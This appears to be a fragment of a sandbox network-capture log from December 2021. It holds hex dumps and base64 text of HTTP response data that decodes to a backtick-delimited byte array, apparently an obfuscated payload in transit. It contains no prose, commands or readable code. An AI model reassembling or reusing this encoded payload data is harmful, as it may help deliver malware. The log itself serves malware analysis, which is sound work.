                                                                Data Ascii: LGAxNyxgMjMsYDk5LGBGRCxgN0YsYEJDLGBGMyxgRjIsYDJCLGBCQyxgRkMsYEM3LGBCRSxgRkQsYEVCLGA3NyxgRDIsYDdGLGBGMixgOUYsYEZDLGBENixgRkYsYEU4LGBCRixgNkMsYEYyLGBBQSxgQkYsYEVELGBDMCxgOTQsYEM1LGAxNixgQjIsYDI5LGBBRCxgRkEsYDZGLGA3NyxgM0EsYEY4LGA5RixgMjksYDc1LGA1OSxgRkYsYDh
                                                                2021-12-02 20:47:22 UTC400INData Raw: 4c 47 41 34 51 69 78 67 51 55 51 73 59 45 59 35 4c 47 42 47 52 53 78 67 52 6a 55 73 59 44 6c 45 4c 47 41 33 52 53 78 67 52 6a 49 73 59 45 5a 47 4c 47 42 44 4f 53 78 67 4d 6a 59 73 59 44 4a 45 4c 47 42 47 52 53 78 67 4f 55 45 73 59 45 5a 47 4c 47 42 47 51 69 78 67 4d 55 59 73 59 44 64 47 4c 47 42 46 52 53 78 67 51 30 51 73 59 45 59 33 4c 47 42 46 52 69 78 67 52 54 55 73 59 44 55 79 4c 47 42 42 52 69 78 67 51 6b 59 73 59 45 56 44 4c 47 42 42 4e 79 78 67 4e 30 59 73 59 44 63 7a 4c 47 41 79 52 69 78 67 52 44 6b 73 59 44 63 30 4c 47 42 43 4d 43 78 67 4f 45 49 73 59 44 46 46 4c 47 42 47 52 69 78 67 4f 45 45 73 59 44 4e 47 4c 47 42 47 4d 79 78 67 51 55 59 73 59 45 5a 45 4c 47 42 43 4e 79 78 67 52 44 49 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 6a 63 73 59 44 64
                                                                Data Ascii: LGA4QixgQUQsYEY5LGBGRSxgRjUsYDlELGA3RSxgRjIsYEZGLGBDOSxgMjYsYDJELGBGRSxgOUEsYEZGLGBGQixgMUYsYDdGLGBFRSxgQ0QsYEY3LGBFRixgRTUsYDUyLGBBRixgQkYsYEVDLGBBNyxgN0YsYDczLGAyRixgRDksYDc0LGBCMCxgOEIsYDFFLGBGRixgOEEsYDNGLGBGMyxgQUYsYEZELGBCNyxgRDIsYERGLGBFMixgRjcsYDd
                                                                2021-12-02 20:47:22 UTC416INData Raw: 4c 47 41 32 51 79 78 67 52 54 63 73 59 44 6c 45 4c 47 41 32 52 43 78 67 51 6b 4d 73 59 45 59 7a 4c 47 42 45 52 69 78 67 52 6b 59 73 59 44 4d 31 4c 47 41 33 52 69 78 67 52 44 67 73 59 44 64 46 4c 47 42 47 51 53 78 67 52 6b 4d 73 59 44 6c 47 4c 47 42 47 52 43 78 67 4e 30 49 73 59 45 5a 47 4c 47 41 33 4e 43 78 67 52 6b 59 73 59 44 6c 45 4c 47 42 43 52 43 78 67 52 45 59 73 59 44 68 42 4c 47 41 77 4d 79 78 67 4f 54 41 73 59 44 4e 45 4c 47 42 43 4d 69 78 67 51 6a 45 73 59 44 6c 45 4c 47 41 33 4e 79 78 67 4e 30 55 73 59 44 45 31 4c 47 41 33 4d 69 78 67 4f 45 51 73 59 44 64 47 4c 47 42 46 4e 79 78 67 52 55 59 73 59 45 5a 43 4c 47 41 30 4e 79 78 67 52 6b 4d 73 59 44 59 78 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 49 34 4c 47 42 47 52 43 78 67 52 55 59 73 59 44 41
                                                                Data Ascii: LGA2QyxgRTcsYDlELGA2RCxgQkMsYEYzLGBERixgRkYsYDM1LGA3RixgRDgsYDdFLGBGQSxgRkMsYDlGLGBGRCxgN0IsYEZGLGA3NCxgRkYsYDlELGBCRCxgREYsYDhBLGAwMyxgOTAsYDNELGBCMixgQjEsYDlELGA3NyxgN0UsYDE1LGA3MixgOEQsYDdGLGBFNyxgRUYsYEZCLGA0NyxgRkMsYDYxLGBFOSxgNUYsYEI4LGBGRCxgRUYsYDA
                                                                2021-12-02 20:47:22 UTC432INData Raw: 4c 47 41 30 4e 53 78 67 4e 6b 51 73 59 45 5a 47 4c 47 41 32 4e 69 78 67 52 6b 45 73 59 45 5a 45 4c 47 42 43 4e 79 78 67 51 54 45 73 59 44 63 33 4c 47 42 47 52 69 78 67 4e 30 49 73 59 44 64 42 4c 47 42 46 4e 79 78 67 4f 44 51 73 59 44 6b 79 4c 47 41 34 4e 43 78 67 4e 30 59 73 59 44 45 78 4c 47 41 34 4d 53 78 67 52 6b 59 73 59 44 4d 31 4c 47 42 42 4f 53 78 67 52 45 51 73 59 44 6c 47 4c 47 41 30 51 53 78 67 52 44 6b 73 59 44 67 34 4c 47 41 34 52 69 78 67 52 54 6b 73 59 45 5a 45 4c 47 41 32 52 69 78 67 4e 54 45 73 59 44 56 47 4c 47 41 33 52 69 78 67 4d 45 55 73 59 45 4d 78 4c 47 41 33 52 43 78 67 4e 45 55 73 59 44 64 47 4c 47 42 47 52 69 78 67 4d 44 63 73 59 45 4a 47 4c 47 41 7a 4f 53 78 67 51 7a 67 73 59 45 59 79 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 46
                                                                Data Ascii: LGA0NSxgNkQsYEZGLGA2NixgRkEsYEZELGBCNyxgQTEsYDc3LGBGRixgN0IsYDdBLGBFNyxgODQsYDkyLGA4NCxgN0YsYDExLGA4MSxgRkYsYDM1LGBBOSxgREQsYDlGLGA0QSxgRDksYDg4LGA4RixgRTksYEZELGA2RixgNTEsYDVGLGA3RixgMEUsYEMxLGA3RCxgNEUsYDdGLGBGRixgMDcsYEJGLGAzOSxgQzgsYEYyLGA2QixgRkMsYDF
                                                                2021-12-02 20:47:22 UTC448INData Raw: 4c 47 41 30 51 69 78 67 4e 30 59 73 59 44 68 47 4c 47 42 47 52 43 78 67 4e 55 59 73 59 45 5a 46 4c 47 41 30 4e 79 78 67 52 6b 45 73 59 44 5a 47 4c 47 41 77 4e 43 78 67 51 6b 55 73 59 44 63 7a 4c 47 42 45 4e 53 78 67 4e 7a 6b 73 59 45 56 45 4c 47 41 31 52 69 78 67 4e 44 63 73 59 45 49 32 4c 47 42 47 4e 43 78 67 51 55 59 73 59 45 5a 45 4c 47 41 7a 52 69 78 67 52 45 55 73 59 44 52 44 4c 47 42 45 4d 69 78 67 4e 55 59 73 59 45 59 7a 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 45 5a 43 4c 47 42 43 51 79 78 67 51 6a 51 73 59 45 4d 7a 4c 47 41 31 4d 43 78 67 52 45 45 73 59 45 55 33 4c 47 41 77 52 69 78 67 52 55 51 73 59 45 4a 44 4c 47 42 47 52 69 78 67 51 54 63 73 59 45 55 7a 4c 47 42 47 52 43 78 67 4e 55 59 73 59 45 59 78 4c 47 41 31 4e 79 78 67 4e 30 55 73 59 45 59
                                                                Data Ascii: LGA0QixgN0YsYDhGLGBGRCxgNUYsYEZFLGA0NyxgRkEsYDZGLGAwNCxgQkUsYDczLGBENSxgNzksYEVELGA1RixgNDcsYEI2LGBGNCxgQUYsYEZELGAzRixgREUsYDRDLGBEMixgNUYsYEYzLGAzRixgRkEsYEZCLGBCQyxgQjQsYEMzLGA1MCxgREEsYEU3LGAwRixgRUQsYEJDLGBGRixgQTcsYEUzLGBGRCxgNUYsYEYxLGA1NyxgN0UsYEY
                                                                2021-12-02 20:47:22 UTC464INData Raw: 4c 47 41 78 4e 69 78 67 4e 44 45 73 59 45 51 32 4c 47 41 79 4e 43 78 67 4e 6b 45 73 59 44 5a 42 4c 47 41 7a 51 69 78 67 4e 6b 59 73 59 45 5a 47 4c 47 42 43 4e 53 78 67 51 7a 67 73 59 44 64 47 4c 47 41 33 4e 69 78 67 4d 55 4d 73 59 45 4e 47 4c 47 41 78 52 69 78 67 52 6b 59 73 59 45 59 32 4c 47 41 79 4d 79 78 67 4e 45 59 73 59 44 49 33 4c 47 41 78 51 79 78 67 52 6b 4d 73 59 44 55 78 4c 47 42 46 4f 43 78 67 52 54 41 73 59 45 51 33 4c 47 42 47 52 43 78 67 52 6a 51 73 59 45 46 43 4c 47 41 35 52 43 78 67 52 6a 51 73 59 45 4e 43 4c 47 42 43 52 69 78 67 52 54 63 73 59 44 63 33 4c 47 41 32 51 69 78 67 52 6b 51 73 59 44 42 46 4c 47 42 43 51 53 78 67 4e 55 55 73 59 45 59 30 4c 47 41 32 52 69 78 67 52 6b 51 73 59 44 5a 47 4c 47 41 34 4e 69 78 67 51 7a 41 73 59 44 56
                                                                Data Ascii: LGAxNixgNDEsYEQ2LGAyNCxgNkEsYDZBLGAzQixgNkYsYEZGLGBCNSxgQzgsYDdGLGA3NixgMUMsYENGLGAxRixgRkYsYEY2LGAyMyxgNEYsYDI3LGAxQyxgRkMsYDUxLGBFOCxgRTAsYEQ3LGBGRCxgRjQsYEFCLGA5RCxgRjQsYENCLGBCRixgRTcsYDc3LGA2QixgRkQsYDBFLGBCQSxgNUUsYEY0LGA2RixgRkQsYDZGLGA4NixgQzAsYDV
                                                                2021-12-02 20:47:22 UTC480INData Raw: 4c 47 42 44 4d 79 78 67 4d 44 63 73 59 44 64 43 4c 47 42 47 4e 53 78 67 4d 6b 59 73 59 44 46 45 4c 47 41 77 4d 69 78 67 52 55 4d 73 59 44 5a 47 4c 47 42 46 4d 69 78 67 4f 44 45 73 59 44 6c 45 4c 47 42 47 51 79 78 67 52 6a 6b 73 59 45 45 78 4c 47 41 77 4d 69 78 67 4e 54 63 73 59 45 49 77 4c 47 41 31 4e 79 78 67 4d 30 59 73 59 44 55 31 4c 47 42 47 52 69 78 67 4f 44 55 73 59 44 46 45 4c 47 42 43 4d 43 78 67 51 30 59 73 59 44 41 77 4c 47 42 47 4e 69 78 67 52 44 63 73 59 45 5a 44 4c 47 41 7a 52 69 78 67 4e 30 59 73 59 44 6c 43 4c 47 41 33 4f 53 78 67 52 6b 45 73 59 44 42 43 4c 47 41 33 52 69 78 67 52 54 45 73 59 45 59 32 4c 47 41 33 4e 79 78 67 4e 30 51 73 59 45 49 77 4c 47 41 33 52 69 78 67 4e 54 41 73 59 45 5a 42 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 44 5a
                                                                Data Ascii: LGBDMyxgMDcsYDdCLGBGNSxgMkYsYDFELGAwMixgRUMsYDZGLGBFMixgODEsYDlELGBGQyxgRjksYEExLGAwMixgNTcsYEIwLGA1NyxgM0YsYDU1LGBGRixgODUsYDFELGBCMCxgQ0YsYDAwLGBGNixgRDcsYEZDLGAzRixgN0YsYDlCLGA3OSxgRkEsYDBCLGA3RixgRTEsYEY2LGA3NyxgN0QsYEIwLGA3RixgNTAsYEZBLGBBNyxgRkYsYDZ
                                                                2021-12-02 20:47:22 UTC496INData Raw: 4c 47 42 47 4e 79 78 67 4e 6a 67 73 59 45 59 78 4c 47 42 46 4e 69 78 67 52 44 63 73 59 45 45 78 4c 47 42 47 4e 79 78 67 52 6b 55 73 59 44 45 34 4c 47 42 44 51 53 78 67 4e 6a 49 73 59 44 63 33 4c 47 42 45 52 53 78 67 4d 55 49 73 59 45 55 7a 4c 47 42 43 52 43 78 67 52 54 55 73 59 45 52 47 4c 47 42 47 4e 43 78 67 4d 54 4d 73 59 44 55 31 4c 47 42 47 51 53 78 67 52 45 49 73 59 45 5a 47 4c 47 41 35 4d 69 78 67 52 45 59 73 59 45 55 30 4c 47 41 35 52 69 78 67 52 6a 49 73 59 45 52 47 4c 47 41 7a 51 69 78 67 52 6b 49 73 59 44 6b 33 4c 47 41 31 52 53 78 67 4e 6a 45 73 59 44 45 34 4c 47 42 43 52 69 78 67 51 6b 49 73 59 44 4d 33 4c 47 41 34 51 79 78 67 52 45 59 73 59 45 55 35 4c 47 42 43 52 69 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 34 4d 69 78 67 4e 6a 45 73 59 44 52
                                                                Data Ascii: LGBGNyxgNjgsYEYxLGBFNixgRDcsYEExLGBGNyxgRkUsYDE4LGBDQSxgNjIsYDc3LGBERSxgMUIsYEUzLGBCRCxgRTUsYERGLGBGNCxgMTMsYDU1LGBGQSxgREIsYEZGLGA5MixgREYsYEU0LGA5RixgRjIsYERGLGAzQixgRkIsYDk3LGA1RSxgNjEsYDE4LGBCRixgQkIsYDM3LGA4QyxgREYsYEU5LGBCRixgRjksYDc1LGA4MixgNjEsYDR
                                                                2021-12-02 20:47:22 UTC512INData Raw: 4c 47 42 47 52 43 78 67 52 54 4d 73 59 44 46 46 4c 47 42 47 51 69 78 67 4e 6a 6b 73 59 45 55 7a 4c 47 42 45 52 69 78 67 4e 30 49 73 59 45 56 43 4c 47 41 30 4d 69 78 67 51 7a 41 73 59 44 64 46 4c 47 41 30 51 79 78 67 4d 7a 6b 73 59 45 46 44 4c 47 41 77 52 53 78 67 52 44 67 73 59 44 46 44 4c 47 41 32 4d 43 78 67 4e 55 59 73 59 45 5a 46 4c 47 42 47 4d 69 78 67 52 55 59 73 59 45 5a 47 4c 47 41 7a 4d 79 78 67 52 54 6b 73 59 44 56 47 4c 47 42 47 4d 43 78 67 4e 44 63 73 59 44 64 44 4c 47 41 7a 4e 79 78 67 51 7a 67 73 59 44 51 31 4c 47 41 7a 52 43 78 67 52 6a 67 73 59 44 6b 33 4c 47 41 33 52 53 78 67 4d 55 45 73 59 44 59 77 4c 47 41 78 4d 79 78 67 4d 45 59 73 59 45 56 44 4c 47 42 46 52 53 78 67 52 44 55 73 59 45 46 47 4c 47 41 78 52 69 78 67 51 7a 4d 73 59 44 6b
                                                                Data Ascii: LGBGRCxgRTMsYDFFLGBGQixgNjksYEUzLGBERixgN0IsYEVCLGA0MixgQzAsYDdFLGA0QyxgMzksYEFDLGAwRSxgRDgsYDFDLGA2MCxgNUYsYEZFLGBGMixgRUYsYEZGLGAzMyxgRTksYDVGLGBGMCxgNDcsYDdDLGAzNyxgQzgsYDQ1LGAzRCxgRjgsYDk3LGA3RSxgMUEsYDYwLGAxMyxgMEYsYEVDLGBFRSxgRDUsYEFGLGAxRixgQzMsYDk
                                                                2021-12-02 20:47:22 UTC528INData Raw: 4c 47 41 35 4e 79 78 67 52 44 4d 73 59 45 4a 47 4c 47 42 46 51 53 78 67 4f 54 4d 73 59 45 4e 47 4c 47 42 47 52 53 78 67 4e 6a 67 73 59 44 46 47 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 64 47 4c 47 42 46 4f 53 78 67 4e 45 59 73 59 44 41 33 4c 47 42 45 4f 43 78 67 52 45 59 73 59 45 51 78 4c 47 41 77 4d 79 78 67 52 6b 49 73 59 44 42 47 4c 47 42 47 52 43 78 67 4d 54 55 73 59 44 49 78 4c 47 41 32 4f 53 78 67 4d 54 55 73 59 45 52 43 4c 47 41 78 4e 79 78 67 4d 30 59 73 59 44 55 31 4c 47 41 33 52 69 78 67 52 45 4d 73 59 44 41 78 4c 47 42 45 51 69 78 67 4d 44 49 73 59 45 56 44 4c 47 41 35 52 69 78 67 52 6b 45 73 59 44 42 43 4c 47 42 47 52 69 78 67 52 55 51 73 59 44 4e 47 4c 47 41 79 51 79 78 67 52 6b 51 73 59 44 67 31 4c 47 41 33 52 69 78 67 4e 44 59 73 59 44 46
                                                                Data Ascii: LGA5NyxgRDMsYEJGLGBFQSxgOTMsYENGLGBGRSxgNjgsYDFGLGBFQyxgOEIsYDdGLGBFOSxgNEYsYDA3LGBEOCxgREYsYEQxLGAwMyxgRkIsYDBGLGBGRCxgMTUsYDIxLGA2OSxgMTUsYERCLGAxNyxgM0YsYDU1LGA3RixgREMsYDAxLGBEQixgMDIsYEVDLGA5RixgRkEsYDBCLGBGRixgRUQsYDNGLGAyQyxgRkQsYDg1LGA3RixgNDYsYDF
                                                                2021-12-02 20:47:22 UTC544INData Raw: 4c 47 41 34 4d 79 78 67 4e 55 59 73 59 45 4d 33 4c 47 42 46 4e 79 78 67 4d 6b 4d 73 59 45 4a 43 4c 47 41 78 4d 69 78 67 4e 45 59 73 59 44 52 46 4c 47 42 46 4f 53 78 67 51 6b 59 73 59 45 52 43 4c 47 41 77 4d 53 78 67 52 6b 49 73 59 45 59 33 4c 47 41 32 4d 79 78 67 4d 6a 45 73 59 44 4a 46 4c 47 42 47 52 69 78 67 4e 55 51 73 59 45 4a 46 4c 47 42 47 51 79 78 67 52 44 4d 73 59 45 51 79 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 7a 4f 43 78 67 52 6b 51 73 59 45 52 43 4c 47 41 33 51 79 78 67 51 6a 41 73 59 44 59 33 4c 47 42 46 4f 53 78 67 51 6b 59 73 59 45 59 78 4c 47 42 44 4e 79 78 67 52 6b 59 73 59 44 6c 47 4c 47 41 33 4e 69 78 67 4d 7a 45 73 59 45 55 35 4c 47 41 33 52 69 78 67 52 55 55 73 59 45 4a 44 4c 47 42 47 4e 79 78 67 4f 44 63 73 59 45 55
                                                                Data Ascii: LGA4MyxgNUYsYEM3LGBFNyxgMkMsYEJCLGAxMixgNEYsYDRFLGBFOSxgQkYsYERCLGAwMSxgRkIsYEY3LGA2MyxgMjEsYDJFLGBGRixgNUQsYEJFLGBGQyxgRDMsYEQyLGBCRixgRkYsYDNGLGAzOCxgRkQsYERCLGA3QyxgQjAsYDY3LGBFOSxgQkYsYEYxLGBDNyxgRkYsYDlGLGA3NixgMzEsYEU5LGA3RixgRUUsYEJDLGBGNyxgODcsYEU
                                                                2021-12-02 20:47:22 UTC560INData Raw: 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 45 51 33 4c 47 41 34 4e 53 78 67 4e 30 4d 73 59 45 59 77 4c 47 41 32 51 69 78 67 52 54 63 73 59 45 55 35 4c 47 42 42 4e 79 78 67 51 6b 59 73 59 45 5a 42 4c 47 41 35 4d 79 78 67 52 6b 59 73 59 44 4a 46 4c 47 41 30 52 69 78 67 51 6b 59 73 59 45 5a 42 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 44 68 45 4c 47 42 45 52 69 78 67 4d 30 4d 73 59 44 4a 45 4c 47 42 47 52 53 78 67 51 6a 4d 73 59 44 4e 47 4c 47 42 47 4d 53 78 67 51 6a 63 73 59 45 5a 46 4c 47 41 79 4f 53 78 67 4e 6a 49 73 59 45 55 7a 4c 47 42 47 4e 43 78 67 51 6a 63 73 59 45 5a 44 4c 47 41 7a 52 43 78 67 52 45 55 73 59 45 4e 44 4c 47 41 33 52 53 78 67 52 55 45 73 59 44 6b 33 4c 47 42 47 51 79 78 67 4e 6b 49 73 59 44 59 32 4c 47 42 45 52 53 78 67 52 6b 59 73 59 45 59
                                                                Data Ascii: LGBERixgRkMsYEQ3LGA4NSxgN0MsYEYwLGA2QixgRTcsYEU5LGBBNyxgQkYsYEZBLGA5MyxgRkYsYDJFLGA0RixgQkYsYEZBLGBGNyxgRkYsYDhELGBERixgM0MsYDJELGBGRSxgQjMsYDNGLGBGMSxgQjcsYEZFLGAyOSxgNjIsYEUzLGBGNCxgQjcsYEZDLGAzRCxgREUsYENDLGA3RSxgRUEsYDk3LGBGQyxgNkIsYDY2LGBERSxgRkYsYEY
                                                                2021-12-02 20:47:22 UTC576INData Raw: 4c 47 41 31 4f 53 78 67 4e 30 59 73 59 45 56 45 4c 47 41 32 52 69 78 67 4f 54 51 73 59 45 5a 46 4c 47 41 30 4e 53 78 67 52 6b 59 73 59 45 4e 46 4c 47 41 7a 52 69 78 67 4e 30 55 73 59 44 6c 45 4c 47 42 42 4e 53 78 67 4d 54 63 73 59 44 64 47 4c 47 42 46 52 69 78 67 52 55 59 73 59 45 59 31 4c 47 42 43 52 43 78 67 4e 7a 51 73 59 45 5a 45 4c 47 42 47 51 79 78 67 52 44 55 73 59 45 5a 47 4c 47 41 35 4d 69 78 67 4e 6a 55 73 59 45 55 35 4c 47 41 78 52 69 78 67 52 6b 55 73 59 45 45 33 4c 47 42 47 51 79 78 67 4e 45 59 73 59 45 4a 47 4c 47 41 33 52 69 78 67 52 6b 45 73 59 44 42 47 4c 47 42 47 51 79 78 67 4d 6b 49 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 51 54 4d 73 59 44 4a 44 4c 47 41 35 52 43 78 67 52 6b 51 73 59 44 6c 45 4c 47 42 43 4d 79 78 67 4e 30 59 73 59 44 4a
                                                                Data Ascii: LGA1OSxgN0YsYEVELGA2RixgOTQsYEZFLGA0NSxgRkYsYENFLGAzRixgN0UsYDlELGBBNSxgMTcsYDdGLGBFRixgRUYsYEY1LGBCRCxgNzQsYEZELGBGQyxgRDUsYEZGLGA5MixgNjUsYEU5LGAxRixgRkUsYEE3LGBGQyxgNEYsYEJGLGA3RixgRkEsYDBGLGBGQyxgMkIsYEZGLGBGNCxgQTMsYDJDLGA5RCxgRkQsYDlELGBCMyxgN0YsYDJ
                                                                2021-12-02 20:47:22 UTC592INData Raw: 4c 47 41 33 52 69 78 67 52 54 45 73 59 44 56 47 4c 47 42 47 4d 43 78 67 4e 44 63 73 59 45 5a 44 4c 47 42 42 4e 79 78 67 4d 55 49 73 59 44 49 32 4c 47 42 47 4d 79 78 67 4d 6a 63 73 59 44 51 7a 4c 47 41 33 4e 79 78 67 52 6a 41 73 59 45 52 45 4c 47 42 46 51 79 78 67 4e 6b 55 73 59 44 6c 42 4c 47 42 47 52 53 78 67 51 55 51 73 59 45 4d 35 4c 47 41 35 52 43 78 67 52 6b 59 73 59 44 4d 34 4c 47 41 79 4d 43 78 67 51 30 45 73 59 45 5a 47 4c 47 42 45 4d 69 78 67 4e 7a 45 73 59 44 4d 79 4c 47 42 47 52 53 78 67 51 7a 59 73 59 44 64 47 4c 47 41 7a 4e 53 78 67 4d 6a 51 73 59 45 4e 42 4c 47 41 30 51 79 78 67 4f 44 6b 73 59 45 59 79 4c 47 41 32 51 69 78 67 52 6b 55 73 59 44 6c 42 4c 47 41 79 4d 53 78 67 4e 54 45 73 59 44 64 46 4c 47 41 7a 52 43 78 67 4d 6a 45 73 59 44 42
                                                                Data Ascii: LGA3RixgRTEsYDVGLGBGMCxgNDcsYEZDLGBBNyxgMUIsYDI2LGBGMyxgMjcsYDQzLGA3NyxgRjAsYERELGBFQyxgNkUsYDlBLGBGRSxgQUQsYEM5LGA5RCxgRkYsYDM4LGAyMCxgQ0EsYEZGLGBEMixgNzEsYDMyLGBGRSxgQzYsYDdGLGAzNSxgMjQsYENBLGA0QyxgODksYEYyLGA2QixgRkUsYDlBLGAyMSxgNTEsYDdFLGAzRCxgMjEsYDB
                                                                2021-12-02 20:47:22 UTC608INData Raw: 4c 47 42 47 52 43 78 67 51 30 51 73 59 45 5a 46 4c 47 42 44 4f 53 78 67 52 6b 59 73 59 44 4d 30 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 56 47 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 45 31 4c 47 41 32 52 69 78 67 4e 30 55 73 59 44 4a 42 4c 47 42 47 52 43 78 67 4e 45 49 73 59 45 5a 47 4c 47 42 42 4d 53 78 67 52 6a 4d 73 59 45 5a 47 4c 47 41 79 4d 53 78 67 4f 55 51 73 59 45 5a 46 4c 47 41 78 4e 69 78 67 52 6b 59 73 59 45 4e 42 4c 47 41 32 52 69 78 67 4f 54 51 73 59 45 45 31 4c 47 41 31 52 69 78 67 4d 55 4d 73 59 45 5a 45 4c 47 42 43 51 69 78 67 51 6b 59 73 59 44 52 43 4c 47 42 47 51 53 78 67 4f 54 63 73 59 45 5a 46 4c 47 42 44 4e 53 78 67 4d 45 59 73 59 45 5a 47 4c 47 42 42 4e 69 78 67 52 45 59 73 59 44 49 33 4c 47 42 42 4d 79 78 67 4f 54 45 73 59 44 6c
                                                                Data Ascii: LGBGRCxgQ0QsYEZFLGBDOSxgRkYsYDM0LGA0RixgRkYsYEVGLGA2RixgRkYsYEE1LGA2RixgN0UsYDJBLGBGRCxgNEIsYEZGLGBBMSxgRjMsYEZGLGAyMSxgOUQsYEZFLGAxNixgRkYsYENBLGA2RixgOTQsYEE1LGA1RixgMUMsYEZELGBCQixgQkYsYDRCLGBGQSxgOTcsYEZFLGBDNSxgMEYsYEZGLGBBNixgREYsYDI3LGBBMyxgOTEsYDl
                                                                2021-12-02 20:47:22 UTC624INData Raw: 4c 47 41 78 52 53 78 67 52 6a 6b 73 59 45 45 7a 4c 47 42 47 52 69 78 67 4f 44 45 73 59 45 4a 47 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 44 52 46 4c 47 42 47 52 69 78 67 51 55 59 73 59 44 4e 47 4c 47 41 33 4d 53 78 67 52 54 63 73 59 45 49 33 4c 47 41 30 51 69 78 67 52 6b 59 73 59 45 45 35 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 4d 33 4c 47 41 79 52 69 78 67 4e 30 55 73 59 45 56 47 4c 47 42 47 4e 43 78 67 4d 54 63 73 59 45 5a 47 4c 47 41 79 52 43 78 67 52 45 59 73 59 45 5a 43 4c 47 41 78 52 69 78 67 52 6a 4d 73 59 45 52 47 4c 47 41 34 4e 79 78 67 4d 45 4d 73 59 45 4d 79 4c 47 42 46 4e 43 78 67 4d 6b 59 73 59 45 5a 44 4c 47 42 46 4d 69 78 67 4f 54 49 73 59 44 55 32 4c 47 41 77 4d 53 78 67 51 6b 55 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 51 55 59 73 59 44 59
                                                                Data Ascii: LGAxRSxgRjksYEEzLGBGRixgODEsYEJGLGBGMyxgM0YsYDRFLGBGRixgQUYsYDNGLGA3MSxgRTcsYEI3LGA0QixgRkYsYEE5LGA1RixgRkYsYEM3LGAyRixgN0UsYEVGLGBGNCxgMTcsYEZGLGAyRCxgREYsYEZCLGAxRixgRjMsYERGLGA4NyxgMEMsYEMyLGBFNCxgMkYsYEZDLGBFMixgOTIsYDU2LGAwMSxgQkUsYEZGLGA1MyxgQUYsYDY
                                                                2021-12-02 20:47:22 UTC640INData Raw: 4c 47 42 47 4f 53 78 67 4f 55 59 73 59 45 51 77 4c 47 42 43 52 69 78 67 52 6a 55 73 59 45 49 7a 4c 47 42 47 52 69 78 67 4f 45 51 73 59 45 5a 46 4c 47 42 43 52 43 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 45 4e 79 78 67 52 6b 59 73 59 44 52 45 4c 47 42 42 4f 43 78 67 52 54 55 73 59 44 5a 47 4c 47 42 47 4f 53 78 67 4d 30 49 73 59 45 51 78 4c 47 42 43 52 69 78 67 4e 30 59 73 59 45 51 34 4c 47 42 46 4f 53 78 67 4d 30 51 73 59 45 5a 42 4c 47 42 47 4e 79 78 67 51 7a 63 73 59 44 4e 46 4c 47 41 33 52 43 78 67 4e 44 45 73 59 45 5a 47 4c 47 41 7a 52 53 78 67 4e 30 4d 73 59 44 55 32 4c 47 42 45 4d 43 78 67 51 6b 59 73 59 45 5a 47 4c 47 42 45 4f 43 78 67 52 54 6b 73 59 44 4a 47 4c 47 42 42 4d 53 78 67 4e 30 59 73 59 45 5a 47 4c 47 42 44 4e 69 78 67 52 45 59 73 59 45 59
                                                                Data Ascii: LGBGOSxgOUYsYEQwLGBCRixgRjUsYEIzLGBGRixgOEQsYEZFLGBCRCxgRjMsYEY0LGBENyxgRkYsYDRELGBBOCxgRTUsYDZGLGBGOSxgM0IsYEQxLGBCRixgN0YsYEQ4LGBFOSxgM0QsYEZBLGBGNyxgQzcsYDNFLGA3RCxgNDEsYEZGLGAzRSxgN0MsYDU2LGBEMCxgQkYsYEZGLGBEOCxgRTksYDJGLGBBMSxgN0YsYEZGLGBDNixgREYsYEY
                                                                2021-12-02 20:47:22 UTC656INData Raw: 4c 47 42 43 52 69 78 67 52 44 59 73 59 44 6c 47 4c 47 42 47 51 53 78 67 52 54 6b 73 59 44 64 47 4c 47 41 30 52 43 78 67 4e 6b 51 73 59 45 5a 46 4c 47 42 47 4d 79 78 67 51 30 59 73 59 45 5a 46 4c 47 41 79 4e 53 78 67 52 6b 45 73 59 45 59 32 4c 47 41 77 52 69 78 67 51 54 63 73 59 44 64 47 4c 47 41 33 4e 79 78 67 4e 30 59 73 59 44 68 45 4c 47 42 43 52 69 78 67 4f 44 4d 73 59 45 52 46 4c 47 42 47 51 53 78 67 51 6a 45 73 59 44 56 47 4c 47 42 46 4d 79 78 67 52 45 59 73 59 45 59 35 4c 47 41 78 4e 43 78 67 4f 55 59 73 59 45 5a 44 4c 47 41 31 52 53 78 67 51 7a 63 73 59 45 4d 77 4c 47 42 46 4e 79 78 67 52 45 59 73 59 45 5a 42 4c 47 42 46 51 79 78 67 4e 30 59 73 59 45 5a 44 4c 47 42 46 4f 43 78 67 4e 55 59 73 59 45 5a 46 4c 47 41 7a 4e 53 78 67 4f 54 4d 73 59 44 67
                                                                Data Ascii: LGBCRixgRDYsYDlGLGBGQSxgRTksYDdGLGA0RCxgNkQsYEZFLGBGMyxgQ0YsYEZFLGAyNSxgRkEsYEY2LGAwRixgQTcsYDdGLGA3NyxgN0YsYDhELGBCRixgODMsYERFLGBGQSxgQjEsYDVGLGBFMyxgREYsYEY5LGAxNCxgOUYsYEZDLGA1RSxgQzcsYEMwLGBFNyxgREYsYEZBLGBFQyxgN0YsYEZDLGBFOCxgNUYsYEZFLGAzNSxgOTMsYDg
